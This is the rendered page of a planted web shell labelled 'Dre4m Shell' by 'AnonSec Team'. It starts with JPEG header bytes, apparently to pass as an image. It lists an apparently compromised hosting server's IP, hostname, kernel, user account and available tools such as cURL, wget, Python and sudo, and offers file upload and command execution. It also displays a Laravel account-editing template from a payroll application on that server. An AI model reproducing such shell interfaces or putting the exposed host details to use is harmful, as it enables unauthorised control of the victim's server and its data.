ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.147.62.145
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/newpayroll/resources/views/auth/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/newpayroll/resources/views/auth/editAccountOld.blade.php
@extends('layouts.layout')
@section('pageTitle')
  Edit User Account
@endsection

@section('content')
  <form method="post" action="{{ url('/user/editAccount') }}">

  <div class="box-body">
        <div class="row">
            <div class="col-md-12"><!--1st col-->
                @if (count($errors) > 0)
                    <div class="alert alert-danger alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Error!</strong> 
                        @foreach ($errors->all() as $error)
                            <p>{{ $error }}</p>
                        @endforeach
                    </div>
                @endif
                       
                @if(session('msg'))
                    <div class="alert alert-success alert-dismissible" role="alert">
                        <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span>
                        </button>
                        <strong>Success!</strong> 
                        {{ session('msg') }}
                    </div>                        
                @endif

            </div>
            {{ csrf_field() }}
            
                <div class="col-md-12"><!--2nd col-->
                                <div class="row">
                                  <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="userName">Full name</label>
                                           <input type="Text" name="fullName" class="form-control" value="{{ Auth::user()->name }}">
                                        </div>
                                  </div><div class="col-md-6">
                                        <div class="form-group">
                                          <label for="userName">User Name</label>
                                          <input type="Text" name="userName" class="form-control" value="{{ Auth::user()->username }}" readonly>
                                        </div>
                                    </div>
                                 
                                </div>
                                
                                <div class="row">
                                 <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="division">Password</label>
                                          <input type="password" name="password" class="form-control">
                                        </div>
                                  </div>  
                                  
                                    <div class="col-md-6">
                                        <div class="form-group">
                                          <label for="password">Confirm Password</label>
                                          <input type="password" name="password_confirmation" class="form-control">
                                        </div>
                                    </div>
                                    <div class="col-md-6 col-md-offset-6">
                                        <div class="form-group">
                                            <label for=""></label>
                                            <div align="right">
                                                <button class="btn btn-success" type="submit"> Save Profile</button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                </div>
        </div><!-- /.col -->
    </div><!-- /.row -->
  </form>
@endsection

Anon7 - 2022
AnonSec Team